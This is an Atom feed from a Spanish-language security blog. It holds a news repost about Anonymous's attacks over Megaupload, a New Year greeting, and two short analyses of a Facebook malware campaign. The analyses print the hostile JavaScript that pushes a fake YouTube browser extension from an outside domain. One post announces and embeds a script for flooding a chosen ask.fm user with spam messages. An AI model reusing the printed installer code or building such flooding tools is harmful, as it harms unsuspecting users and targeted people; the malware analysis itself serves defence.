<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;DE8DQ306eip7ImA9WhRaEUk.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773</id><updated>2012-02-13T07:27:52.312-08:00</updated><category term="Redes" /><category term="Off Topic" /><category term="ITM" /><category term="Phishing" /><category term="0day" /><category term="WebShell" /><category term="Diseño Grafico" /><category term="GEEK" /><category term="Pwned's" /><category term="Conferencias" /><category term="Anonymous" /><category term="Comic" /><category term="Diclosure" /><category term="iSQL" /><category term="Byppass" /><category term="Metasploit Framework" /><category term="Auditorías de Seguridad" /><category term="Noticias" /><category term="Eventos" /><category term="Dump" /><category term="Spam" /><category term="Disclosure" /><category term="Facebook" /><category term="Laboratorios" /><category term="MSSQL" /><category term="SMS" /><category term="Scanning" /><category term="Tutoriales Hacking" /><category term="MySQL" /><category term="SSH" /><category term="Criptografía" /><category term="Paper's" /><category term="Cracking" /><category term="Social Engineer Toolkit (SET)" /><category term="Owned" /><category term="Libro" /><category term="Automoviles" /><category term="WarGames" /><category term="Ofuscación" /><category term="Sec-Track" /><category term="PHP" /><category term="Robo" /><category term="Tournament" /><category term="Joomla" /><category term="Reporte" /><category term="LFI" /><category term="Hacked" /><category term="Linux" /><category term="Proxy" /><category term="ask.fm" /><category term="Tools" /><category term="Priv8" /><category term="Full Source Disclosure" /><category term="Intrusiones" /><category term="XSS" /><category term="Análisis de Malware" /><title>in[S]eguridad [I]nformatica</title><subtitle type="html">Una vulnerabilidad es tan limitada como tu quieras que sea</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://shellrootsecurity.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>132</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/blogspot/huJTw" /><feedburner:info uri="blogspot/hujtw" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>blogspot/huJTw</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;D08BSXk9eyp7ImA9WhRbGEg.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-1960847748815413543</id><published>2012-01-20T22:34:00.000-08:00</published><updated>2012-02-09T22:37:38.763-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-09T22:37:38.763-08:00</app:edited><title>¿quién desató la guerra cibernética en estados unidos?</title><content type="html">&lt;div class="IMGpequena"&gt;
&lt;img height="176" src="http://www.it-networks.org/wp-content/uploads/2012/01/megaupload-shut-down-545x300.jpg" width="320" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La red está en guerra. El grupo &lt;a href="http://actualidad.rt.com/tag/865" target="_blank"&gt;Anonymous&lt;/a&gt; &lt;a href="http://actualidad.rt.com/actualidad/ee_uu/issue_35084.html" target="_blank"&gt;ha saboteado los sitios web del FBI&lt;/a&gt;, el Ministerio de Justicia estadounidense y algunas casas discográficas en protesta contra el cierre del portal Megaupload. Pero los analistas creen que esta guerra cibernética fue desatada por las mismas autoridades que intentando controlar la red no dejaron otra salida a la ciudadanía que luchar.
&lt;br /&gt;
&lt;br /&gt;
En un vídeo colgado en YouTube, un grupo de activistas de Anonymus asumió la responsabilidad de los sabotajes de los portales del Gobierno federal estadounidense, entre ellos el sitio del FBI, de Justicia y de la Casa Blanca. 5.000 usuarios asociados a este grupo lograron dejar inaccesibles esos portales generando una sobrecarga por numerosas entradas a sus páginas de internet. "Somos el 99%, somos Anonymous", publicó el grupo en la red social de Twitter.
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://actualidad.rt.com/ciencia_y_tecnica/internet_redes/issue_34977.html" target="_blank"&gt;Google y Wikipedia se habían unido a la protesta&lt;/a&gt; y se alcanzaron los primeros resultados de la lucha: el Congreso estadounidense decidió hace unas horas posponer los debates de las leyes contra la piratería cibernética.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="IMGpequena"&gt;
&lt;object width="380" height="300"&gt;
&lt;param name="movie" value="http://actualidad.rt.com/swf/player.swf?file=http://actualidad.rt.com/images/publications/32/video_issue_35110.flv&amp;image=http://actualidad.rt.com/images/publications/32/slide_issue_35110.jpg&amp;controlbar=over&amp;skin=http://actualidad.rt.com/swf/skin/stylish1.swf&amp;streamer=lighttpd"&gt;&lt;/param&gt;
&lt;embed src="http://actualidad.rt.com/swf/player.swf?file=http://actualidad.rt.com/images/publications/32/video_issue_35110.flv&amp;image=http://actualidad.rt.com/images/publications/32/slide_issue_35110.jpg&amp;controlbar=over&amp;skin=http://actualidad.rt.com/swf/skin/stylish1.swf&amp;streamer=lighttpd" type="application/x-shockwave-flash" allowfullscreen="true" width="380" height="300" /&gt;
&lt;/object&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;El miembro de la organización Vamos Unidos USA Juan José Gutiérrez cree que la Casa Blanca está preocupada porque no puede controlar la información en la red. Y por eso Washington incrementa el espionaje no solo a sus ciudadanos, sino al resto de personas en internet.
&lt;br /&gt;
&lt;br /&gt;
La guerra cibernética ya ha comenzado. No creo que la inició la ciudadanía, más bien pienso que la iniciaron los gobiernos que están preocupados porque circulan sin controles ideas, se intercambian materiales entre los ciudadanos de países a larga y corta distancia y a final de cuentas de todo el mundo. Particularmente si eso implica acción social que cuestione el autoritarismo, ese está siendo el sentir desde hace años por parte de las autoridades en contra de la ciudadanía", comentó Gutiérrez a RT.
&lt;br /&gt;
&lt;br /&gt;
El analista considera que EE. UU. no solamente puede incrementar el espionaje en contra de sus ciudadanos y de sus no ciudadanos en todo el mundo, "de hecho lo han estado incrementando. Básicamente las autoridades decidirían quiénes, bajo sospecha de estar infringiendo las leyes de derecho de autor, las autoridades tendrían el derecho de proceder en contra de estas personas antes de que se pudiera comprobar culpabilidad. Eso demuestra una vez más lo erróneo de estas políticas porque una vez más bajo el argumento de proteger en este caso la propiedad intelectual -la música, películas y otros contenidos de carácter comercial-, lo que realmente se estaría haciendo es restringir y sumarle control a la red. Es decir, la ciudadanía tendría cada vez menos control sobre esta herramienta de información y de intercambio de información", dijo.
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://actualidad.rt.com/actualidad/ee_uu/issue_35086.html" target="_blank"&gt;Algunos expertos, como por ejemplo Barrett Brown, un colaborador de Anonymous, creen que estos conflictos entre los activistas de la red y las autoridades de EE. UU. en el mundo podrían escalar a niveles desproporcionados.&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
"El problema es que el comportamiento del Gobierno norteamericano y el del resto de países, en el caso de que les otorguemos poderes para hacer una cosa, casi siempre la interpretan a su manera para que puedan hacer cosas aún mayores. El operativo contra el sitio Megaupload demuestra que incluso antes de que la Ley antipirata entre en vigor, han arrestado a sus dueños y han cerrado la página. Imagínense qué sucederá cuando aprueben la SOPA. Mi grupo ya inició una operación pensada para asegurarnos de que SOPA sea derrotada y los que la apoyan resulten intimidados, para que estemos seguros de que no vuelven a pasar cosas como esta", contó a RT Barrett Brown.
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Articulo completo en:&lt;/b&gt; http://actualidad.rt.com/actualidad/ee_uu/issue_35110.html&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-1960847748815413543?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Tij_qaEFAiStfSzaKGQ-9phhEDs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Tij_qaEFAiStfSzaKGQ-9phhEDs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Tij_qaEFAiStfSzaKGQ-9phhEDs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Tij_qaEFAiStfSzaKGQ-9phhEDs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/2-7LExH6gBE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/1960847748815413543/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2012/01/quien-desato-la-guerra-cibernetica-en.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/1960847748815413543?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/1960847748815413543?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/2-7LExH6gBE/quien-desato-la-guerra-cibernetica-en.html" title="¿quién desató la guerra cibernética en estados unidos?" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2012/01/quien-desato-la-guerra-cibernetica-en.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0ENQXc6fyp7ImA9WhRbFkU.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-6042795662908533874</id><published>2012-01-06T00:05:00.000-08:00</published><updated>2012-02-07T22:14:50.917-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-07T22:14:50.917-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="ask.fm" /><title>FuckingAskFM! SCRIPT SPAM para ASK.FM</title><content type="html">&lt;div class="IMGpequena"&gt;&lt;img src="http://ask.fm/images/download/ask_fm-logo-200x200.png" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Caprichos y más caprichos, este es uno de los tantos que tengo ahora, y como no tengo nada que hacer y mi novia esta de viaje, pues que más se puede hacer, y para divertirme un rato &lt;b&gt;FuckingAskFM!&lt;/b&gt;... &lt;br /&gt;
&lt;br /&gt;
Después de haber hablado un poco del &lt;a href="http://shellrootsecurity.blogspot.com/2011/12/el-peligro-de-usar-askfm.html" target="_blank"&gt;peligro de usar ese famoso sistema&lt;/a&gt; de preguntas llamado &lt;strike&gt;Fucking&lt;/strike&gt;&lt;a href="http://ask.fm/" target="_blank"&gt;Ask.FM&lt;/a&gt; y nadie sigue los concejos pues decidí crear un script de SPAM &lt;i&gt;( y más que todo, un metodo para promocionar mi blog ajjaja)&lt;/i&gt;, para ver si algún día se acabe esa perderá de tiempo &lt;i&gt;(no se que le ven de bueno responder preguntas)&lt;/i&gt;. &lt;br /&gt;
&lt;br /&gt;
El script consiste en enviar muchos mensajes al mismo perfil para saturar la cuenta, &lt;i&gt;(y molestar personas jajaja)&lt;/i&gt; para que al fin se den cuenta de que eso no sirve, es una mierda. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Viernes 6 de Enero de 2012 - 2:40AM&lt;/b&gt;&lt;br /&gt;
Hasta el momento, tengo es script que manda las solicitudes, ahora no más falta diseñar algo básico para la presentación. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Viernes 6 de Enero de 2012 - 3:30AM&lt;/b&gt;&lt;br /&gt;
Ya tengo el diseño, hasta ahora el script funciona de la siguiente manera: &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Se ingresa el nick del usuario victima.&lt;br /&gt;
&lt;b&gt;2.&lt;/b&gt;Se ingresa el mensaje SPAM.&lt;br /&gt;
&lt;b&gt;3.&lt;/b&gt;Se ingresa el número de veces que se realizará la petición.&lt;br /&gt;
&lt;br /&gt;
Ahora, sólo queda montarlo a mi hosting. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Viernes 6 de Enero de 2012 - 4:04AM&lt;/b&gt;&lt;br /&gt;
Ya esta todo listo, quedaré a la espera de ahora levantarme temprano y codearlo de forma automática. &lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;Más información ver la nota mental.&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTA MENTAL&lt;/b&gt;&lt;br /&gt;
Se me ha ocurrido, esparcir mi script automáticamente, realizando primero una petición a la pagina principal de &lt;a href="http://ask.fm/" target="_blank"&gt;Ask.FM&lt;/a&gt; sacando los perfiles que se muestran en el footer &lt;i&gt;(más publicidad muhahahaha)&lt;/i&gt;. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe frameborder="no" height="345" noresize="" scrolling="AUTO" src="http://shellroot.vacau.com/index.php" width="420"&gt;&lt;/iframe&gt;&lt;/center&gt;  &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-6042795662908533874?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/dH2UcNN-W1NJDyQVOS-cyTQLoKs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/dH2UcNN-W1NJDyQVOS-cyTQLoKs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/dH2UcNN-W1NJDyQVOS-cyTQLoKs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/dH2UcNN-W1NJDyQVOS-cyTQLoKs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/5kShpjpfIdQ" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/6042795662908533874/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2012/01/fuckingaskfm-script-spam-para-askfm.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/6042795662908533874?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/6042795662908533874?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/5kShpjpfIdQ/fuckingaskfm-script-spam-para-askfm.html" title="FuckingAskFM! SCRIPT SPAM para ASK.FM" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2012/01/fuckingaskfm-script-spam-para-askfm.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkIMR3k_cCp7ImA9WhRWE08.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-1549779446649998009</id><published>2011-12-31T00:36:00.000-08:00</published><updated>2011-12-31T00:36:26.748-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-31T00:36:26.748-08:00</app:edited><title>Feliz año nuevo amigos h4x0rs! [2012]</title><content type="html">&lt;br /&gt;
&lt;center&gt;&lt;img height="305" src="http://dscleon.files.wordpress.com/2010/10/h4x0rs.png" width="400" /&gt;&lt;/center&gt;

&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Él, mi gran mentor, un dia me dijo que mi vida era como un gran libro que se escribe día tras día y que lo cierre cuando se acabe. Él me lo enseño todo, mi vida y espíritu me pertenecen y sin él no sería lo que soy ahora.
&lt;br/&gt;
&lt;br/&gt;
Feliz navidad mis queridos amigos...
&lt;br/&gt;
@&lt;a href="http://www.facebook.com/profile.php?id=1085231737"&gt;Kevin Astroz&lt;/a&gt;, @&lt;a href="http://www.facebook.com/darioxhcx"&gt;Dario Skywálker&lt;/a&gt;, @&lt;a href="http://www.facebook.com/MikeSoft"&gt;Mike Brian&lt;/a&gt; y a los muchos otros que me ayudaron...&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-1549779446649998009?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/l_UXsQF8l2VurK9_1R6FEKWvoVQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/l_UXsQF8l2VurK9_1R6FEKWvoVQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/l_UXsQF8l2VurK9_1R6FEKWvoVQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/l_UXsQF8l2VurK9_1R6FEKWvoVQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/RjYm3J00Uyo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/1549779446649998009/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/12/feliz-ano-nuevo-amigos-h4x0rs-2012.html#comment-form" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/1549779446649998009?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/1549779446649998009?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/RjYm3J00Uyo/feliz-ano-nuevo-amigos-h4x0rs-2012.html" title="Feliz año nuevo amigos h4x0rs! [2012]" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/12/feliz-ano-nuevo-amigos-h4x0rs-2012.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0ACRX8yfyp7ImA9WhRbFkU.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-4264015190719732158</id><published>2011-12-19T21:50:00.000-08:00</published><updated>2012-02-07T22:16:04.197-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-07T22:16:04.197-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="Análisis de Malware" /><title>LA NUEVA VARIANTE DEL MALWARE DE FACEBOOK</title><content type="html">&lt;div class="IMGpequena"&gt;&lt;img height="200" src="http://mayadigital.com/images2/Malware_Facebook.jpg" width="320" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ya es demasiado para caer de nuevo en los malwares de esta red social. &lt;br /&gt;
&lt;br /&gt;
De nuevo el mismo malware se esta esparciendo por toda la red social como si nunca hubiera existido, ya se ha explicado muchas veces que hay que tener cuidado con los enlaces externos. &lt;br /&gt;
&lt;br /&gt;
Lo que me llama la atención es que cambiaron la interface por una más, como se podría llamar eso, ¿Llamativa?, ya que ahora parece como si estuvieras ingresando a &lt;a href="http://www.youtube.com/" target="_blank"&gt;youtube.com&lt;/a&gt;, &lt;i&gt;-cabe destacar que tiene la nueva interfaz de usuario-&lt;/i&gt;, hay que darle puntos por ser tan creativo. &lt;br /&gt;
&lt;br /&gt;
Analizaré de nuevo el código a ver sí lo han mejorado un poco, la primer dirección que tengo es &lt;a href="http://woutubewatch1.blogspot.com/" target="_blank"&gt;woutubewatch1.blogspot.com&lt;/a&gt;, y tenemos lo siguiente, &lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;img border="0" height="233" src="http://3.bp.blogspot.com/-Fe1MtKXRcus/TvAYMi3o4-I/AAAAAAAAAPw/YtjkhyJYRIM/s400/1.png" width="400" /&gt;&lt;/center&gt;&lt;br /&gt;
&lt;br /&gt;
Ahora el perfil apunta a &lt;a href="http://www.blogger.com/profile/08956306515188510108" target="_blank"&gt;profile/08956306515188510108&lt;/a&gt;, tiene el mismo iframe, pero esta vez a, &lt;br /&gt;
&lt;pre class="brush: php"&gt;#
&amp;lt;iframe
         class = "change"
   frameborder = "0"
        height = "300"
     scrolling = "no"
           src = "http://realityvidb.info/plugin.html?id=31"
         video = "16"
         width = "500"&amp;gt;
&amp;lt;/iframe&amp;gt;
#&lt;/pre&gt;Al parecer cambiaron de código por otro wiiii, en el nuevo dominio, tenemos la siguiente función, que es la principal, donde se instala el complemento, llamada instalar(), &lt;i&gt;-que tan obvio-&lt;/i&gt;... &lt;br /&gt;
&lt;pre class="brush: javascript"&gt;#
  # PRIMERO VERIFICAMOS EL NAVEGADOR PARA INSTALAR EL PLUG-IN
  var is_chrome,is_firefox;
  is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') &amp;gt; -1;
  is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') &amp;gt; -1;

  # DESPUÉS SE EJECUTA LA FUNCIÓN
  function instalar() {
    if (is_chrome) {
      click_img();
      window.open("http://realityvidb.info/b/youtubees.crx");
    }else if (is_firefox){
      click_img();
      var params = {
        "Youtube Extension":{
          URL      : "http://realityvidb.info/b/youtubees.xpi",
          toString : function (){ return this.URL; }
        }
      };
      InstallTrigger.install(params);
    }else{
      window.open("http://www.google.com/chrome/eula.html");
    }
  }
#&lt;/pre&gt;También existe una función donde carga una imagen, igual que la que encontró mi amigo @alguien, &lt;i&gt;-tendré que esperarlo a ver si me ayuda con una duda que tengo-&lt;/i&gt;, &lt;br /&gt;
&lt;pre class="brush: javascript"&gt;#
  function click_img(){
    var body=document.getElementsByTagName("body")[0];
    if(body==null)return false;
    var img=document.createElement("img");
    img.src="http://whos.amung.us/swidget/installpez.gif";
    img.width="0";
    img.height="0";
    img.border="0";
    body.appendChild(img);
  }
#&lt;/pre&gt;Todavía queda por analizar unas cuantas cosas, pero esperaré un momento, recordemos como eliminarlo. &lt;br /&gt;
Para &lt;a href="http://support.google.com/chrome/bin/answer.py?hl=es&amp;amp;answer=113907" target="_blank"&gt;Google Chrome&lt;/a&gt; Para &lt;a href="http://support.mozilla.com/es/kb/Desinstalar%20los%20complementos#w_deshabilitar-extensiones-0-personassf-y-plugins" target="_blank"&gt;Firefox&lt;/a&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-4264015190719732158?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/PxbvbKFc6Tyf3hkDRZVBN0wYqqo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PxbvbKFc6Tyf3hkDRZVBN0wYqqo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/PxbvbKFc6Tyf3hkDRZVBN0wYqqo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PxbvbKFc6Tyf3hkDRZVBN0wYqqo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/mgYiA7SGlD4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/4264015190719732158/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/12/la-nueva-variante-del-malware-de.html#comment-form" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4264015190719732158?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4264015190719732158?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/mgYiA7SGlD4/la-nueva-variante-del-malware-de.html" title="LA NUEVA VARIANTE DEL MALWARE DE FACEBOOK" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-Fe1MtKXRcus/TvAYMi3o4-I/AAAAAAAAAPw/YtjkhyJYRIM/s72-c/1.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/12/la-nueva-variante-del-malware-de.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUIERXo6eSp7ImA9WhRQFko.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-4347957796704148643</id><published>2011-12-11T22:11:00.000-08:00</published><updated>2011-12-11T23:05:04.411-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-11T23:05:04.411-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="Análisis de Malware" /><title>MALWARE DE NUEVO EN FACEBOOK</title><content type="html">&lt;div class="IMGpequena"&gt;&lt;img height="150" src="http://www.geekets.com/wp-content/uploads/2011/06/Malware-en-Facebook.jpg" width="200" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El día de hoy &lt;b&gt;Lunes 12 de Diciembre de 2011&lt;/b&gt;, a las &lt;b&gt;12:15 A.M&lt;/b&gt;, inicia el mini análisis del malware que ronda por &lt;a href="http://www.facebook.com/" target="_blank"&gt;Facebook&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Como primer movimiento tenemos la pagina &lt;a href="http://tuqam5.blogspot.com/" target="_blank"&gt;tuqam5.blogspot.com&lt;/a&gt;, que por ahora será la principal del sitio del malware. &lt;br /&gt;
&lt;br /&gt;
Cuando ingresamos a la URL, nos aparece la siguiente pantalla, pidiéndonos descargar un supuesto plug-in de &lt;a href="http://www.youtube.com/" target="_blank"&gt;Youtube&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-SGgxdnAvdbA/TuWPLOfMD8I/AAAAAAAAAOY/6tnL6G-kHmg/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="195" src="http://1.bp.blogspot.com/-SGgxdnAvdbA/TuWPLOfMD8I/AAAAAAAAAOY/6tnL6G-kHmg/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Imagen 1:&lt;/b&gt; Descarga de plug-in.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Ahora nos pide que lo instalemos, &lt;i&gt;(Hasta sale el logo de &lt;a href="http://www.youtube.com/" target="_blank"&gt;Youtube&lt;/a&gt; jajajaja)&lt;/i&gt;,&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
